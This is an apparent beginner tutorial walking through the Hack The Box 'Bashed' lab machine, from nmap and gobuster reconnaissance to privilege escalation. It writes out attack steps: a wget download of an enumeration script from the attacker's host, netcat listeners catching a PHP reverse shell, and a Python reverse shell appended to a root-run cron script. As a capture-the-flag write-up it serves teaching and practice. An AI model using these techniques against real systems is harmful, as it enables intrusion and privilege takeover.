In this article our Prof. Herbert Fernandez Tamayo, will start the series called «Hack The Box Series» (Getting started in HTB).
This will be a beginner friendly and very detailed Tutorial of: ¿What skills do you need to complete the Bash machine? & ¿How to complete the machine?.
¡Without further to say, enjoy the article!
One of the most common questions when we are starting in the Infosecurity world is: “should I have technical skills as a programmer?” and you may spend several hours reading or watching videos and maybe you will not find a yes/no answer; as a matter of fact, many senior hackers tell us that they never knew how to write a single line of code when they started to hacking.
In that line, I would like to show how to solve the Hack The Box machine called Bashed, from here referred as “the box”, with the idea of how to find an answer for yourself, let’s jump in!.
Connect to Hack The Box network. For this, you need an active HTB profile and ideally a Linux based operating system such as Kali Linux or Parrot Os. After that, from your profile download your VPN Server connect pack. It is recommended that you create a directory to store screenshots and files that will be created in the different phases, finally it is a good idea to take your own notes. You may use a word processor or software like CherryTree, Obsidian and other.
Phase 1: reconnaisance.
We need to gather information about what ports are open in the machine. One of the best tools to accomplish the task is Nmap. The syntaxis of the command is:
nmap -sC -sV -oA <filename><bashed_ip_address>
- -sC: use default scripts scan.
- -sV: gather information from opened ports, including services, name and version.
- -oA: save the result in 3 different formats: gnmap, nmap, and xml; this is a good idea because we have a flexibility to go deep in the results using fiel format that can help us to analyze them. This parameter is totally optional, it depends on you.
- Comments about the result:
- We only have an opened port, which is port 80 related to the Apache Application Server. We obtained the version, 2.4.18, and it is deployed on an Ubuntu Operating System Machine.
- We should check what ubuntus version is associated with Apache 2.4.18, however this is not mandatory it might be. Useful, the idea is to gather all possible information; if we google something like «Apache 2.4.18 ubuntu version» we obtain something like this:
As a final step in this phase, let’s check what is the output of the port 80, if it is listening there’s Something published and accessible through it; let’s open a web browser and type the IP associated to Bashed.
- In the above image, we can see a website, we don’t care about the information, it would be great to find some link where to type credentials or another resource that help us to gain access to the system or keep collecting information about it, but in this case, we didn’t find anything useful.
Phase 2: enumeration.
We need to identify resources in the machine that can help us to gain access eventually. One approach is to enumerate files and directories, for that, we may use tools like dirbuster, gobuster and ferobuster, in this occasion, I will use gobuster.
- -u: url we need to enumerate, don’t forget to include the protocol: either http or https.
- -w: it refers to the dictionary we want to use for the enumeration process.
- Part of the results are directories like php, uploads and dev, we shall give an eye to each directory in order to verify if there are explotable resources, in this time, we will focus on dev directory.
- Also, I stopped gobuster «using Ctrl + C Keywords» because I got the result I needed, but it is a good idea to let the enumeration ends.
- Research about what other dictionaries are available in Kali Linus.
- Execute the above enumeration process using dirbuster and ferobuster.
Go back to our Web Browser and lets see what is inside dev:
- the script provides us a terminal like interfaces, from here, we can execute some commands
- In the above image we can see the output of the commands: id, ls, ifconfig
- is this your first time using a terminal? If so, research about what are the advantages to use a terminal.
- what is the equivalent for a Linux terminal in Windows OS?
- Answer yourself: why you should develop tech skills in non-gui tools?
So, we have an interface that let us execute some commands and at this point we need a hint about resources that can help us to gain access, those resources can be: users accounts, vulnerabilities inside the OS, exploitable running process between others. This is where the level of a researcher -ethical hacker, pentester, redteamer, etc- needs to show: to use a bruteforce should be the last option to use, one of the objective is to make the less noise we can during our testing, remember that in a company should be a team in charge of monitoring malicious activities and use a brute force tool generates malicious activities.
Let’s make a test, please follow these steps:
- Go to your web browser and search for something like “LinEnum repository”
- Once you find it, clone it to your OS
- copy the file LinEnum.sh to your working directory
In the bellow images you may find part of the requested execution:
Now, we need to upload this script to the box. As a first step, let’s raise a HTTP Server, although we may use Apache Server, the quickest is to use python:
As you can see, we are using the port 80 to allow incoming connections.
Let’s go back to the box and let’s connect to our Kali Linux to copy LinEnum.sh:
The command is: wget http://10.10.14.3/LinEnum.sh
- -wget: it is a command to connect to a host. In this case, we are connected to the port 80 (which is the default port for most of the Application Server)
- -the IP address 10.10.14.3 refers to the one assigned to my Kali OS after get connection to the HtB’s VPN, it doesn’t refer to the IP assigned from the LAN we are part of.
- -If the requested file is found, instantly is upload to the origin of the request connection, in this case, our box.
- Pay attention to the directory where LinEnum.sh was copied. Research about the user permission of this directory, also, read about /dev/null
- What are files with the extension sh?
- How can we be sure if we can execute LinEnum.sh in /dev/shm
If everything went OK, if you use the ls command you should see a file called LinEnum.sh, cool!, now, let’s run it:
you should start to see a lot of output, wait until the command ends and after that, try to search for this part of the output:
This is the list of valid user’s account into the OS, take in count in some of them, at the end of the line, there’s a parameter called “nologin”, moreover, take a look at the end of the block, where the syntax of those accounts is pretty different from the other ones
- research about the difference in the parameters of each group of user’s accounts.
All right, the account scriptmanager is pretty interesting, let’s try to execute a command using scriptmanager account, let’s try this:
sudo -u scriptmanager whoami
ok, we obtained output, specifically, this gave us a hint to the possibility to execute any command using as scriptmanager, although, we need a fully functional environment, a terminal, in order to gain access to this machine, in the actual condition, we have a very basic one and it’s very hard to continue.
Do you remember the results gotten during gobuster directory scan?, go back to check them and try to find any result related to uploads directory, well, in here, we are going to upload “a malicious file” that can help us to obtain a full shell environment and then escalate privileges.
Let’s go back to our Kali OS and from our terminal let’s type:
Hint: Research about what is a bind shell and a reverse shell and why is useful.
in the above image you got the full path of the php file we need, copy it to your current working directory, if everything goes as expected, do a ls command and you should obtain an output like this:
Note that the file’s name is different, that’s on me, it’s not a must to change it.
Cool, now, let’s open this file, please locate the variables called $ip and $port and change them with our tun0’s IP and port 8081, after that save the file and close your editor; the result, in my case, goes like this:
OK, our reverse shell is ready, we need to raise an Application Server in order to upload it to the box, go back in this writeup look for a solution how to accomplish this task.
Awesome, let’s go back to the box and if our Application Server is listening, go to var/www/html/uploads and type the next command:
In the below image you can find the sequence of the appropriate steps execution:
Phase 3: Gaining Access
Here comes the funniest part, when all this effort becomes into a result; from your Kali OS:
- from your terminal window, open a new tab
- from here, we need to start a “listener”, so type the next command: nc -lvnp 8081 (remember the port you typed inside the reverse shell? Well, this is it.
- Next, go to your web browser, open a new tab and type: http://<ipbashedbox>/uploads/phprshell.php
- is the webpage loading? If so, don’t stop it
- <ipbashedbox>= in my case it’s 10.10.10.68
- uploads = it’s the directory where we uploaded the reverse shell we found in our Kali OS
- phprshell.php = the name of the reverse shell
Cool: let’s go to our Kali and click on our latest terminal -where we open a “listener”-, did you find something different, like this:
of course you did!, we are inside on bashed box!!!
- research about how and why a reverse shell helps us to gain access to a system
Let’s continue, we need to tweak this shell to use actions or keystroke like: Move Up, Move Down, Ctrl+S, Ctrl+C, clear the screen, there are different ways to obtain a fully functional terminal, in this case, we will use python, please be careful executing the next steps:
- Python -c ‘import pty;pty.spawn(“/bin/bash”)’
- (Ctrl+Z keystroke)
- stty -raw -echo;fg
- (Press Enter twice)
What is the purpose of those commands? Well, we combined our Kali’s terminal settings with Bashed Box’s terminal setting, just like make a mirror between their terminals.
How do I know if it works? Type the next ones:
- (you should get a message)
- export TERM = xterm
- did it work? If so, you are a step closer!
Cool, let’s test some commands:
- sudo -u scriptmanager bash,
- ls -la
- Explain what did it change?
- Why was necessary to execute the above commands?
- Take a look to the $HOME of your current user? Do you see something interesting?
Phase 4: Privilege Escalation
All right, last level!; let’s go back to root’s OS directory, let’s type:
Next steps, let’s see if we can find something useful in here:
The output should look like this:
Can you see it? There’s a directory called “scripts” and the owner is “scriptmanager” and our credential in use is “scriptmanager”, so let’s take a look:
- cd scripts
- ls -la
We can see two files, one with the “py” extension and the other one is “txt”. Maybe they are related, let’s type again:
- ls -la → wait 1 minute
- ls -la → wait another minute
the text file has a different timestamp, isn’t it?
- open test.py and see what’s inside,
- can you guess what programming language is related to those lines?
- What does this script do?
- Go back to your Kali OS, open a new browser terminal and search for something like “reverse shell cheat sheet”
- Try to find a result related to pentestermonkey.net, open it and then copy the entire line related to Python
- Did you get it?
When you get the lines for our python based reverse shell, open a text editor and paste them, we need to format them like the next ones:
In the lines.connect(), use your tun0’s IP Address and an available port, for example: 1234
Finally, copy the lines, but you have to be sure they are look like the above images; close your text editor and let’s open a listener -the name is netcat – on the port 1234 we already set in the above script:
- nc -nlvp 1234
Let’s go back to our box and follow these steps:
- edit the file: test.py
- go to the last line and press ENTER
- Paste the lines you copied
- Save the file
Your test.py should looks like this:
Ready?, OK, close your text editor and wait 1 minute, then let’s go back to your Kali OS, specifically to your latest terminal tab and did you notice something different? Did you? try these commands:
- cd /root
- cat root.txt
- cd /home
- cd arrexel
- cat user.txt
you did it! You pwned bashed!, now, go to your HackTheBox account and paste user and root flags.
- This is not a race, do not follow this -or any- writeup just for finish it, take your time, understand the methodology and if you have questions, ask them!
- The flags are purely symbolic, the most important is to understand what vulnerabilities we found, how to exploit them (red team) and how to patch it (blue team)
- now, can you answer the next one: is it useful to learn programming and Linux if you want to jump into cybersecurity? Let me know
- ping me on Twitter @heftamayo
Thank you for your time (Prof. Herbert Tamayo).
Contact Prof. Herbert Tamayo